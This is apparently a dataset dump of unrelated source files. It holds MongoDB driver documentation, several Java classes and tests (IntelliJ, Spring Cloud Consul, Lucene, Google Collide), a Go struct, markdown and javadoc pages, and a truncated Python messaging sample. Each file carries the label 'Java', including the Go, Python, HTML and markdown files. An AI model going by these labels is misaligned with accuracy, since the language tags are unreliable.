<li><code>stream</code> tells the user if the object can operate as a Node.js stream.</li> <li><code>instrumentations</code> an array which contains all the methods available for instrumentation. The methods are grouped by method characteristics. All methods that support a callback as well as a promise will be grouped in a single instrumentation. This simplifies the code to perform the actual instrumentation.</li> </ul> <pre><code class="language-js">{ &quot;methods&quot;: [ &quot;open&quot;, &quot;getc&quot;, &quot;puts&quot;, &quot;write&quot;, &quot;writeFile&quot;, &quot;close&quot;, &quot;unlink&quot;, &quot;readlines&quot;, &quot;rewind&quot;, &quot;read&quot;, &quot;tell&quot;, &quot;seek&quot; ], &quot;options&quot;: { &quot;callback&quot;: true, &quot;promise&quot;: true } } </code></pre> <p>The <code>methods</code> array contains all the methods that have the options <code>callback=true</code> and <code>promise=true</code> for the GridStore prototype. The available options are:</p> <table> <thead> <tr> <th>Options</th> <th align="left">Description</th> </tr> </thead> <tbody> <tr> <td>callback</td> <td align="left">The method supports a callback</td> </tr> <tr> <td>promise</td> <td align="left">The method can return a promise</td> </tr> <tr> <td>static</td> <td align="left">The method is a static method (not on the prototype)</td> </tr> <tr> <td>returns</td> <td align="left">The method can return one of the types in the array</td> </tr> </tbody> </table> <p>Below is a very basic instrumentation example.</p> <pre><code class="language-js">const listener = require('../..').instrument(function(err, instrumentations) { instrumentations.forEach(function(obj) { const object = obj.obj; // Iterate over all the methods that are just callback with no return obj.instrumentations.forEach(function(instr) { const options = instr.options; if(options.callback &amp;&amp; !options.returns &amp;&amp; !options.static) { // Method name instr.methods.forEach(function(method) { function applyMethod(_method) { const func = object.prototype[_method]; overrides.push({ obj: object.prototype, method: _method, func: func }); object.prototype[_method] = function() { if(!methodsCalled[_method]) methodsCalled[_method] = 0; methodsCalled[_method] = methodsCalled[_method] + 1; const args = Array.prototype.slice.call(arguments, 0); func.apply(this, args); } } applyMethod(method); }); } }); }); }); </code></pre> <p>This instrumentation only overrides methods that have callbacks and ignores promises, so it&rsquo;s not a complete solution, but shows how an API user can structure code to tap into the exposed surface of the driver.</p> <div id="btnv"> <div class="pull-left"> <a class="navigation prev" href="/node-mongodb-native/3.1/reference/management/logging/"> <i class="fa fa-long-arrow-left"> </i> Logging </a> </div> <div class="pull-right"> <a class="navigation next" href="/node-mongodb-native/3.1/reference/management/sdam-monitoring/"> Topology Monitoring <i class="fa fa-long-arrow-right"> </i> </a> </div> </div> </div> <div class="right-column"> <div class="wrapper"> <div class="toc"> <span class="toc-header">On this page</span> <nav id="TableOfContents"> <ul> <li><a href="#apm">APM</a> <ul> <li><a href="#api">API</a></li> <li><a href="#command-monitoring">Command Monitoring</a> <ul> <li><a href="#operationidgenerator">operationIdGenerator</a></li> <li><a href="#timestampgenerator">timestampGenerator</a></li> </ul></li> <li><a href="#instrumentation">Instrumentation</a></li> </ul></li> </ul> </nav> </div> </div> </div> </div> </div> </div> </section> </section> </section> <script type="text/javascript"> var DOCUMENTATION_OPTIONS = { URL_ROOT: "/node-mongodb-native/3.1", VERSION: "3.1", COLLAPSE_INDEX: false, FILE_SUFFIX: '.html', HAS_SOURCE: true }; </script> <script type="text/javascript" src="/node-mongodb-native/3.1/js/jquery.js"></script> <script type="text/javascript" src="/node-mongodb-native/3.1/lib/bootstrap.js"></script> <script type="text/javascript" src="/node-mongodb-native/3.1/js/navbar.js"></script> <script type="text/javascript" src="/node-mongodb-native/3.1/lib/highlight/highlight.pack.js"></script> <script type="text/javascript" src="/node-mongodb-native/3.1/js/scripts.js"></script> <script type="text/javascript" src="/node-mongodb-native/3.1/lib/bootstrap-toggle/bootstrap-toggle.min.js"></script> <script type="text/javascript" src="/node-mongodb-native/3.1/js/java.js"></script> <script type="text/javascript" src="/node-mongodb-native/3.1/js/toggle-switch.js"></script> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-29229787-1', 'auto'); ga('send', 'pageview'); </script> </body> </html>
Java
// Copyright 2000-2020 JetBrains s.r.o. Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file. package com.intellij.ide.plugins.newui; import com.intellij.ide.IdeBundle; import com.intellij.ui.JBColor; import com.intellij.util.ui.JBUI; import org.jetbrains.annotations.Nls; import org.jetbrains.annotations.NotNull; import java.awt.*; /** * @author Alexander Lobas */ public class TagComponent extends LinkComponent { private static final Color BACKGROUND = JBColor.namedColor("Plugins.tagBackground", new JBColor(0xEAEAEC, 0x4D4D4D)); private static final Color EAP_BACKGROUND = JBColor.namedColor("Plugins.eapTagBackground", new JBColor(0xF2D2CF, 0xF2D2CF)); private static final Color PAID_BACKGROUND = JBColor.namedColor("Plugins.paidTagBackground", new JBColor(0xD8EDF8, 0x3E505C)); private static final Color TRIAL_BACKGROUND = JBColor.namedColor("Plugins.trialTagBackground", new JBColor(0xDBE8DD, 0x345574E)); private static final Color FOREGROUND = JBColor.namedColor("Plugins.tagForeground", new JBColor(0x787878, 0x999999)); private Color myColor; public TagComponent() { setForeground(FOREGROUND); setPaintUnderline(false); setOpaque(false); setBorder(JBUI.Borders.empty(1, 8)); } public TagComponent(@NotNull @Nls String name) { this(); setText(name); } @Override public void setText(@NotNull @Nls String name) { String tooltip = null; myColor = BACKGROUND; if (Tags.EAP.name().equals(name)) { myColor = EAP_BACKGROUND; tooltip = IdeBundle.message("tooltip.eap.plugin.version"); } else if (Tags.Trial.name().equals(name) || Tags.Purchased.name().equals(name)) { myColor = TRIAL_BACKGROUND; } else if (Tags.Paid.name().equals(name) || Tags.Freemium.name().equals(name)) { myColor = PAID_BACKGROUND; tooltip = IdeBundle.message("tooltip.paid.plugin"); } super.setText(name); setToolTipText(tooltip); } @Override protected void paintComponent(Graphics g) { //noinspection UseJBColor g.setColor(myUnderline ? new Color(myColor.getRed(), myColor.getGreen(), myColor.getBlue(), 178) : myColor); g.fillRect(0, 0, getWidth(), getHeight()); super.paintComponent(g); } @Override protected boolean isInClickableArea(Point pt) { return true; } }
Java
package esilegacy /* Gateway timeout model */ type GatewayTimeout struct { /* Gateway timeout message */ Error_ string `json:"error,omitempty"` /* number of seconds the request was given */ Timeout int32 `json:"timeout,omitempty"` }
Java
/* * Copyright 2013-2019 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.springframework.cloud.consul.discovery; import org.junit.jupiter.api.Test; import org.springframework.cloud.commons.util.InetUtils; import org.springframework.cloud.commons.util.InetUtilsProperties; import static org.assertj.core.api.Assertions.assertThat; /** * @author Spencer Gibb */ public class ConsulCatalogWatchTests { @Test public void isRunningReportsCorrectly() { ConsulDiscoveryProperties properties = new ConsulDiscoveryProperties(new InetUtils(new InetUtilsProperties())); ConsulCatalogWatch watch = new ConsulCatalogWatch(properties, null) { @Override public void catalogServicesWatch() { // do nothing } }; assertThat(watch.isRunning()).isFalse(); watch.start(); assertThat(watch.isRunning()).isTrue(); watch.stop(); assertThat(watch.isRunning()).isFalse(); } }
Java
// Copyright 2012 Google Inc. All Rights Reserved. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package com.google.collide.client.editor; import com.google.collide.client.util.logging.Log; import com.google.collide.json.shared.JsonArray; import com.google.collide.shared.document.Document; import com.google.collide.shared.document.Line; import com.google.collide.shared.document.LineInfo; import com.google.collide.shared.document.anchor.Anchor; import com.google.collide.shared.document.anchor.Anchor.RemovalStrategy; import com.google.collide.shared.document.anchor.AnchorManager; import com.google.collide.shared.document.anchor.AnchorType; import com.google.collide.shared.util.ListenerRegistrar.Remover; import com.google.collide.shared.util.SortedList; import com.google.collide.shared.util.SortedList.OneWayIntComparator; /** * This class takes care of mapping between the different coordinates used by * the editor. The two supported systems are: * <ul> * <li>Offset (x,y) - in pixels, relative to the top left of line 0 in the * current document. * <li>Line (line, column) - the real line number and column, taking into * account spacer objects in between lines. Lines and columns are 0-indexed. * </ul> */ class CoordinateMap implements Document.LineListener { interface DocumentSizeProvider { float getEditorCharacterWidth(); int getEditorLineHeight(); void handleSpacerHeightChanged(Spacer spacer, int oldHeight); } private static class OffsetCache { private static final SortedList.Comparator<OffsetCache> COMPARATOR = new SortedList.Comparator<OffsetCache>() { @Override public int compare(OffsetCache a, OffsetCache b) { return a.offset - b.offset; } }; private static final SortedList.OneWayIntComparator<OffsetCache> Y_OFFSET_ONE_WAY_COMPARATOR = new SortedList.OneWayIntComparator<OffsetCache>() { @Override public int compareTo(OffsetCache s) { return value - s.offset; } }; private static final SortedList.OneWayIntComparator<OffsetCache> LINE_NUMBER_ONE_WAY_COMPARATOR = new SortedList.OneWayIntComparator<OffsetCache>() { @Override public int compareTo(OffsetCache s) { return value - s.lineNumber; } }; private final int offset; private final int height; private final int lineNumber; private OffsetCache(int offset, int lineNumber, int height) { this.offset = offset; this.height = height; this.lineNumber = lineNumber; } } private static final OffsetCache BEGINNING_EMPTY_OFFSET_CACHE = new OffsetCache(0, 0, 0); private static final AnchorType SPACER_ANCHOR_TYPE = AnchorType.create(CoordinateMap.class, "spacerAnchorType"); private static final Spacer.Comparator SPACER_COMPARATOR = new Spacer.Comparator(); private static final Spacer.OneWaySpacerComparator SPACER_ONE_WAY_COMPARATOR = new Spacer.OneWaySpacerComparator(); /** Used by {@link #getPrecedingOffsetCache(int, int)} */ private static final int IGNORE = Integer.MIN_VALUE; private Document document; private DocumentSizeProvider documentSizeProvider; /** List of offset cache items, sorted by the offset */ private SortedList<OffsetCache> offsetCache; /** * True if there is at least one spacer in the editor, false otherwise (false * means a simple height / line height calculation can be used) */ private boolean requiresMapping; /** Sorted by line number */ private SortedList<Spacer> spacers; /** Summation of all spacers' heights */ private int totalSpacerHeight; /** Remover for listener */ private Remover documentLineListenerRemover; CoordinateMap(DocumentSizeProvider documentSizeProvider) { this.documentSizeProvider = documentSizeProvider; requiresMapping = false; } int convertYToLineNumber(int y) { if (y < 0) { return 0; } int lineHeight = documentSizeProvider.getEditorLineHeight(); if (!requiresMapping) { return y / lineHeight; } OffsetCache precedingOffsetCache = getPrecedingOffsetCache(y, IGNORE); int precedingOffsetCacheBottom = precedingOffsetCache.offset + precedingOffsetCache.height; int lineNumberRelativeToOffsetCacheLine = (y - precedingOffsetCacheBottom) / lineHeight; if (y < precedingOffsetCacheBottom) { // y is inside the spacer return precedingOffsetCache.lineNumber; } else { return precedingOffsetCache.lineNumber + lineNumberRelativeToOffsetCacheLine; } } /** * Returns the top of the given line. */ int convertLineNumberToY(int lineNumber) { int lineHeight = documentSizeProvider.getEditorLineHeight(); if (!requiresMapping) { return lineNumber * lineHeight; } OffsetCache precedingOffsetCache = getPrecedingOffsetCache(IGNORE, lineNumber); int precedingOffsetCacheBottom = precedingOffsetCache.offset + precedingOffsetCache.height; int offsetRelativeToOffsetCacheBottom = (lineNumber - precedingOffsetCache.lineNumber) * lineHeight; return precedingOffsetCacheBottom + offsetRelativeToOffsetCacheBottom; } /** * Returns the first {@link OffsetCache} that is positioned less than or equal * to {@code y} or {@code lineNumber}. This methods fills the * {@link #offsetCache} if necessary ensuring the returned {@link OffsetCache} * is up-to-date. * * @param y the y, or {@link #IGNORE} if looking up by {@code lineNumber} * @param lineNumber the line number, or {@link #IGNORE} if looking up by * {@code y} */ private OffsetCache getPrecedingOffsetCache(int y, int lineNumber) { assert (y != IGNORE && lineNumber == IGNORE) || (lineNumber != IGNORE && y == IGNORE); final int lineHeight = documentSizeProvider.getEditorLineHeight(); OffsetCache previousOffsetCache; if (y != IGNORE) { previousOffsetCache = getCachedPrecedingOffsetCacheImpl(OffsetCache.Y_OFFSET_ONE_WAY_COMPARATOR, y); } else { previousOffsetCache = getCachedPrecedingOffsetCacheImpl(OffsetCache.LINE_NUMBER_ONE_WAY_COMPARATOR, lineNumber); } if (previousOffsetCache == null) { if (spacers.size() > 0 && spacers.get(0).getLineNumber() == 0) { previousOffsetCache = createOffsetCache(0, 0, spacers.get(0).getHeight()); } else { previousOffsetCache = BEGINNING_EMPTY_OFFSET_CACHE; } } /* * Optimization so the common case that the target has previously been * computed requires no more computation */ int offsetCacheSize = offsetCache.size(); if (offsetCacheSize > 0 && isTargetEarlierThanOffsetCache(y, lineNumber, offsetCache.get(offsetCacheSize - 1))) { return previousOffsetCache; } // This will return this offset cache's matching spacer int spacerPos = getPrecedingSpacerIndex(previousOffsetCache.lineNumber); /* * We want the spacer following this offset cache's spacer, or the first * spacer if none were found */ spacerPos++; for (int n = spacers.size(); spacerPos < n; spacerPos++) { Spacer curSpacer = spacers.get(spacerPos); int previousOffsetCacheBottom = previousOffsetCache.offset + previousOffsetCache.height; int simpleLinesHeight = (curSpacer.getLineNumber() - previousOffsetCache.lineNumber) * lineHeight; if (simpleLinesHeight == 0) { Log.warn(Spacer.class, "More than one spacer on line " + previousOffsetCache.lineNumber); } // Create an offset cache for this spacer OffsetCache curOffsetCache = createOffsetCache(previousOffsetCacheBottom + simpleLinesHeight, curSpacer.getLineNumber(), curSpacer.getHeight()); if (isTargetEarlierThanOffsetCache(y, lineNumber, curOffsetCache)) { return previousOffsetCache; } previousOffsetCache = curOffsetCache; } return previousOffsetCache; } /** * Returns the {@link OffsetCache} instance in list that has the greatest * value less than or equal to the given {@code value}. Returns null if there * isn't one. * * This should only be used by {@link #getPrecedingOffsetCache(int, int)}. */ private OffsetCache getCachedPrecedingOffsetCacheImpl( OneWayIntComparator<OffsetCache> comparator, int value) { comparator.setValue(value); int index = offsetCache.findInsertionIndex(comparator, false); return index >= 0 ? offsetCache.get(index) : null; } private boolean isTargetEarlierThanOffsetCache(int y, int lineNumber, OffsetCache offsetCache) { return ((y != IGNORE && y < offsetCache.offset) || (lineNumber != IGNORE && lineNumber < offsetCache.lineNumber)); } private OffsetCache createOffsetCache(int offset, int lineNumber, int height) { OffsetCache createdOffsetCache = new OffsetCache(offset, lineNumber, height); offsetCache.add(createdOffsetCache); return createdOffsetCache; } private int getPrecedingSpacerIndex(int lineNumber) { SPACER_ONE_WAY_COMPARATOR.setValue(lineNumber); return spacers.findInsertionIndex(SPACER_ONE_WAY_COMPARATOR, false); } /** * Adds a spacer above the given lineInfo line with height heightPx and * returns the created Spacer object. * * @param lineInfo the line before which the spacer will be inserted * @param height the height in pixels of the spacer */ Spacer createSpacer(LineInfo lineInfo, int height, Buffer buffer, String cssClass) { int lineNumber = lineInfo.number(); // create an anchor on the current line Anchor anchor = document.getAnchorManager().createAnchor(SPACER_ANCHOR_TYPE, lineInfo.line(), lineNumber, AnchorManager.IGNORE_COLUMN); anchor.setRemovalStrategy(RemovalStrategy.SHIFT); // account for the height of the line the spacer is on Spacer spacer = new Spacer(anchor, height, this, buffer, cssClass); spacers.add(spacer); totalSpacerHeight += height; invalidateLineNumberAndFollowing(lineNumber); requiresMapping = true; return spacer; } boolean removeSpacer(Spacer spacer) { int lineNumber = spacer.getLineNumber(); if (spacers.remove(spacer)) { document.getAnchorManager().removeAnchor(spacer.getAnchor()); totalSpacerHeight -= spacer.getHeight(); invalidateLineNumberAndFollowing(lineNumber - 1); updateRequiresMapping(); return true; } return false; } void handleDocumentChange(Document document) { if (documentLineListenerRemover != null) { documentLineListenerRemover.remove(); } this.document = document; spacers = new SortedList<Spacer>(SPACER_COMPARATOR); offsetCache = new SortedList<OffsetCache>(OffsetCache.COMPARATOR); documentLineListenerRemover = document.getLineListenerRegistrar().add(this); requiresMapping = false; // starts with no items in list totalSpacerHeight = 0; } @Override public void onLineAdded(Document document, int lineNumber, JsonArray<Line> addedLines) { invalidateLineNumberAndFollowing(lineNumber); } @Override public void onLineRemoved(Document document, int lineNumber, JsonArray<Line> removedLines) { invalidateLineNumberAndFollowing(lineNumber); } /** * Call this after any line changes (adding/deleting lines, changing line * heights). Only invalidate (delete) cache items >= lineNumber, don't * recalculate. */ void invalidateLineNumberAndFollowing(int lineNumber) { OffsetCache.LINE_NUMBER_ONE_WAY_COMPARATOR.setValue(lineNumber); int insertionIndex = offsetCache.findInsertionIndex(OffsetCache.LINE_NUMBER_ONE_WAY_COMPARATOR); offsetCache.removeThisAndFollowing(insertionIndex); } private void updateRequiresMapping() { // check to change active status requiresMapping = spacers.size() > 0; } int getTotalSpacerHeight() { return totalSpacerHeight; } void handleSpacerHeightChanged(Spacer spacer, int oldHeight) { totalSpacerHeight -= oldHeight; totalSpacerHeight += spacer.getHeight(); invalidateLineNumberAndFollowing(spacer.getLineNumber()); documentSizeProvider.handleSpacerHeightChanged(spacer, oldHeight); } }
Java
package com.unitvectory.shak.jarvis.model; import static org.junit.Assert.assertEquals; import static org.junit.Assert.assertNotNull; import static org.junit.Assert.assertNull; import static org.junit.Assert.assertTrue; import org.junit.Test; import com.unitvectory.shak.jarvis.util.ResourceHelper; /** * Tests the SmartThingsPublish class * * @author Jared Hatfield * */ public class SmartThingsPublishTest { /** * Test the parser being given a null value */ @Test public void testNullStringParse() { JsonPublishRequest myRequest = null; SmartThingsPublish smart = new SmartThingsPublish(myRequest); assertNotNull(smart); assertNull(smart.getPublish()); assertNull(smart.getAuth()); assertNull(smart.getDate()); assertNull(smart.getDescription()); assertNull(smart.getDescriptionText()); assertNull(smart.getDeviceId()); assertNull(smart.getHubId()); assertNull(smart.getId()); assertNull(smart.getLocationId()); assertNull(smart.getName()); assertNull(smart.getSource()); assertNull(smart.getUnit()); assertNull(smart.getValue()); } /** * Test the parser when things go perfectly. */ @Test public void testValidParse() { // Load the test JSON String json = ResourceHelper.load("/messagebody.json"); assertNotNull(json); assertTrue(json.length() > 0); // Create the object JsonPublishRequest request = new JsonPublishRequest(json); assertNotNull(request); assertTrue(request.isValid()); assertNotNull(request.getData()); // Create the SmartThingsPublish SmartThingsPublish smart = new SmartThingsPublish(request); assertNotNull(smart); assertEquals("foobar", smart.getAuth()); assertEquals("2013-12-30T16:03:08.224Z", smart.getDate()); assertEquals( "raw:08EF170A59FF, dni:08EF, battery:17, batteryDivisor:0A, rssi:59, lqi:FF", smart.getDescription()); assertEquals("Sensor was -39 dBm", smart.getDescriptionText()); assertEquals("2fffffff-fffff-ffff-ffff-fffffffffff", smart.getDeviceId()); assertEquals("3fffffff-fffff-ffff-ffff-fffffffffff", smart.getHubId()); assertEquals("1fffffff-fffff-ffff-ffff-fffffffffff", smart.getId()); assertEquals("4fffffff-fffff-ffff-ffff-fffffffffff", smart.getLocationId()); assertEquals("rssi", smart.getName()); assertEquals("DEVICE", smart.getSource()); assertEquals("dBm", smart.getUnit()); assertEquals("-39", smart.getValue()); } }
Java
/* * #%L * wcm.io * %% * Copyright (C) 2015 wcm.io * %% * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * #L% */ package io.wcm.devops.conga.plugins.sling.validator; import static org.junit.jupiter.api.Assertions.assertFalse; import static org.junit.jupiter.api.Assertions.assertThrows; import static org.junit.jupiter.api.Assertions.assertTrue; import java.io.File; import java.nio.charset.StandardCharsets; import org.junit.jupiter.api.BeforeEach; import org.junit.jupiter.api.Test; import io.wcm.devops.conga.generator.spi.ValidationException; import io.wcm.devops.conga.generator.spi.ValidatorPlugin; import io.wcm.devops.conga.generator.spi.context.FileContext; import io.wcm.devops.conga.generator.util.PluginManagerImpl; public class ProvisioningValidatorTest { private ValidatorPlugin underTest; @BeforeEach public void setUp() { underTest = new PluginManagerImpl().get(ProvisioningValidator.NAME, ValidatorPlugin.class); } @Test public void testValid() throws Exception { File file = new File(getClass().getResource("/validProvisioning.txt").toURI()); FileContext fileContext = new FileContext().file(file).charset(StandardCharsets.UTF_8); assertTrue(underTest.accepts(fileContext, null)); underTest.apply(fileContext, null); } @Test public void testInvalid() throws Exception { File file = new File(getClass().getResource("/invalidProvisioning.txt").toURI()); FileContext fileContext = new FileContext().file(file).charset(StandardCharsets.UTF_8); assertTrue(underTest.accepts(fileContext, null)); assertThrows(ValidationException.class, () -> { underTest.apply(fileContext, null); }); } @Test public void testInvalidFileExtension() throws Exception { File file = new File(getClass().getResource("/noProvisioning.txt").toURI()); FileContext fileContext = new FileContext().file(file).charset(StandardCharsets.UTF_8); assertFalse(underTest.accepts(fileContext, null)); } }
Java
project-meet ============
Java
package org.targettest.org.apache.lucene.store; /** * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import java.io.IOException; import java.io.Closeable; import java.util.Map; import java.util.HashMap; /** Abstract base class for input from a file in a {@link Directory}. A * random-access input stream. Used for all Lucene index input operations. * @see Directory */ public abstract class IndexInput implements Cloneable,Closeable { private boolean preUTF8Strings; // true if we are reading old (modified UTF8) string format /** Reads and returns a single byte. * @see IndexOutput#writeByte(byte) */ public abstract byte readByte() throws IOException; /** Reads a specified number of bytes into an array at the specified offset. * @param b the array to read bytes into * @param offset the offset in the array to start storing bytes * @param len the number of bytes to read * @see IndexOutput#writeBytes(byte[],int) */ public abstract void readBytes(byte[] b, int offset, int len) throws IOException; /** Reads a specified number of bytes into an array at the * specified offset with control over whether the read * should be buffered (callers who have their own buffer * should pass in "false" for useBuffer). Currently only * {@link BufferedIndexInput} respects this parameter. * @param b the array to read bytes into * @param offset the offset in the array to start storing bytes * @param len the number of bytes to read * @param useBuffer set to false if the caller will handle * buffering. * @see IndexOutput#writeBytes(byte[],int) */ public void readBytes(byte[] b, int offset, int len, boolean useBuffer) throws IOException { // Default to ignoring useBuffer entirely readBytes(b, offset, len); } /** Reads four bytes and returns an int. * @see IndexOutput#writeInt(int) */ public int readInt() throws IOException { return ((readByte() & 0xFF) << 24) | ((readByte() & 0xFF) << 16) | ((readByte() & 0xFF) << 8) | (readByte() & 0xFF); } /** Reads an int stored in variable-length format. Reads between one and * five bytes. Smaller values take fewer bytes. Negative numbers are not * supported. * @see IndexOutput#writeVInt(int) */ public int readVInt() throws IOException { byte b = readByte(); int i = b & 0x7F; for (int shift = 7; (b & 0x80) != 0; shift += 7) { b = readByte(); i |= (b & 0x7F) << shift; } return i; } /** Reads eight bytes and returns a long. * @see IndexOutput#writeLong(long) */ public long readLong() throws IOException { return (((long)readInt()) << 32) | (readInt() & 0xFFFFFFFFL); } /** Reads a long stored in variable-length format. Reads between one and * nine bytes. Smaller values take fewer bytes. Negative numbers are not * supported. */ public long readVLong() throws IOException { byte b = readByte(); long i = b & 0x7F; for (int shift = 7; (b & 0x80) != 0; shift += 7) { b = readByte(); i |= (b & 0x7FL) << shift; } return i; } /** Call this if readString should read characters stored * in the old modified UTF8 format (length in java chars * and java's modified UTF8 encoding). This is used for * indices written pre-2.4 See LUCENE-510 for details. */ public void setModifiedUTF8StringsMode() { preUTF8Strings = true; } /** Reads a string. * @see IndexOutput#writeString(String) */ public String readString() throws IOException { if (preUTF8Strings) return readModifiedUTF8String(); int length = readVInt(); final byte[] bytes = new byte[length]; readBytes(bytes, 0, length); return new String(bytes, 0, length, "UTF-8"); } private String readModifiedUTF8String() throws IOException { int length = readVInt(); final char[] chars = new char[length]; readChars(chars, 0, length); return new String(chars, 0, length); } /** Reads Lucene's old "modified UTF-8" encoded * characters into an array. * @param buffer the array to read characters into * @param start the offset in the array to start storing characters * @param length the number of characters to read * @see IndexOutput#writeChars(String,int,int) * @deprecated -- please use readString or readBytes * instead, and construct the string * from those utf8 bytes */ public void readChars(char[] buffer, int start, int length) throws IOException { final int end = start + length; for (int i = start; i < end; i++) { byte b = readByte(); if ((b & 0x80) == 0) buffer[i] = (char)(b & 0x7F); else if ((b & 0xE0) != 0xE0) { buffer[i] = (char)(((b & 0x1F) << 6) | (readByte() & 0x3F)); } else buffer[i] = (char)(((b & 0x0F) << 12) | ((readByte() & 0x3F) << 6) | (readByte() & 0x3F)); } } /** * Expert * * Similar to {@link #readChars(char[], int, int)} but does not do any conversion operations on the bytes it is reading in. It still * has to invoke {@link #readByte()} just as {@link #readChars(char[], int, int)} does, but it does not need a buffer to store anything * and it does not have to do any of the bitwise operations, since we don't actually care what is in the byte except to determine * how many more bytes to read * @param length The number of chars to read * @deprecated this method operates on old "modified utf8" encoded * strings */ public void skipChars(int length) throws IOException{ for (int i = 0; i < length; i++) { byte b = readByte(); if ((b & 0x80) == 0){ //do nothing, we only need one byte } else if ((b & 0xE0) != 0xE0) { readByte();//read an additional byte } else{ //read two additional bytes. readByte(); readByte(); } } } /** Closes the stream to further operations. */ public abstract void close() throws IOException; /** Returns the current position in this file, where the next read will * occur. * @see #seek(long) */ public abstract long getFilePointer(); /** Sets current position in this file, where the next read will occur. * @see #getFilePointer() */ public abstract void seek(long pos) throws IOException; /** The number of bytes in the file. */ public abstract long length(); /** Returns a clone of this stream. * * <p>Clones of a stream access the same data, and are positioned at the same * point as the stream they were cloned from. * * <p>Expert: Subclasses must ensure that clones may be positioned at * different points in the input from each other and from the stream they * were cloned from. */ @Override public Object clone() { IndexInput clone = null; try { clone = (IndexInput)super.clone(); } catch (CloneNotSupportedException e) {} return clone; } public Map<String,String> readStringStringMap() throws IOException { final Map<String,String> map = new HashMap<String,String>(); final int count = readInt(); for(int i=0;i<count;i++) { final String key = readString(); final String val = readString(); map.put(key, val); } return map; } }
Java
# ExportHistoryResponse ## Properties Name | Type | Description | Notes ------------ | ------------- | ------------- | ------------- **count** | **Long** | | [optional] **data** | [**ExportDataArray**](ExportDataArray.md) | | [optional] **offset** | **Long** | | [optional] **total** | **Long** | | [optional]
Java
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_31) on Mon Oct 01 00:28:16 PDT 2012 --> <TITLE> org.apache.hadoop.metrics.file (Hadoop 1.0.3.16 API) </TITLE> <META NAME="date" CONTENT="2012-10-01"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../stylesheet.css" TITLE="Style"> </HEAD> <BODY BGCOLOR="white"> <FONT size="+1" CLASS="FrameTitleFont"> <A HREF="../../../../../org/apache/hadoop/metrics/file/package-summary.html" target="classFrame">org.apache.hadoop.metrics.file</A></FONT> <TABLE BORDER="0" WIDTH="100%" SUMMARY=""> <TR> <TD NOWRAP><FONT size="+1" CLASS="FrameHeadingFont"> Classes</FONT>&nbsp; <FONT CLASS="FrameItemFont"> <BR> <A HREF="FileContext.html" title="class in org.apache.hadoop.metrics.file" target="classFrame">FileContext</A></FONT></TD> </TR> </TABLE> </BODY> </HTML>
Java
## Copyright 2022 Google LLC ## ## Licensed under the Apache License, Version 2.0 (the "License"); ## you may not use this file except in compliance with the License. ## You may obtain a copy of the License at ## ## https://www.apache.org/licenses/LICENSE-2.0 ## ## Unless required by applicable law or agreed to in writing, software ## distributed under the License is distributed on an "AS IS" BASIS, ## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. ## See the License for the specific language governing permissions and ## limitations under the License. """Sends a text mesage to the user with a suggestion action to dial a phone number. Read more: https://developers.google.com/business-communications/business-messages/guides/how-to/message/send?hl=en#dial_action This code is based on the https://github.com/google-business-communications/python-businessmessages Python Business Messages client library. """ import uuid from businessmessages import businessmessages_v1_client as bm_client from businessmessages.businessmessages_v1_messages import BusinessmessagesConversationsMessagesCreateRequest from businessmessages.businessmessages_v1_messages import BusinessMessagesDialAction from businessmessages.businessmessages_v1_messages import BusinessMessagesMessage from businessmessages.businessmessages_v1_messages import BusinessMessagesRepresentative from businessmessages.businessmessages_v1_messages import BusinessMessagesSuggestedAction from businessmessages.businessmessages_v1_messages import BusinessMessagesSuggestion from oauth2client.service_account import ServiceAccountCredentials # Edit the values below: path_to_service_account_key = './service_account_key.json' conversation_id = 'EDIT_HERE' credentials = ServiceAccountCredentials.from_json_keyfile_name( path_to_service_account_key, scopes=['https://www.googleapis.com/auth/businessmessages']) client = bm_client.BusinessmessagesV1(credentials=credentials) representative_type_as_string = 'BOT' if representative_type_as_string == 'BOT': representative_type = BusinessMessagesRepresentative.RepresentativeTypeValueValuesEnum.BOT else: representative_type = BusinessMessagesRepresentative.RepresentativeTypeValueValuesEnum.HUMAN # Create a text message with a dial action and fallback text message = BusinessMessagesMessage( messageId=str(uuid.uuid4().int), representative=BusinessMessagesRepresentative( representativeType=representative_type ), text='Contact support for help with this issue.', fallback='Give us a call at +12223334444.', suggestions=[ BusinessMessagesSuggestion( action=BusinessMessagesSuggestedAction( text='Call support', postbackData='call-support', dialAction=BusinessMessagesDialAction( 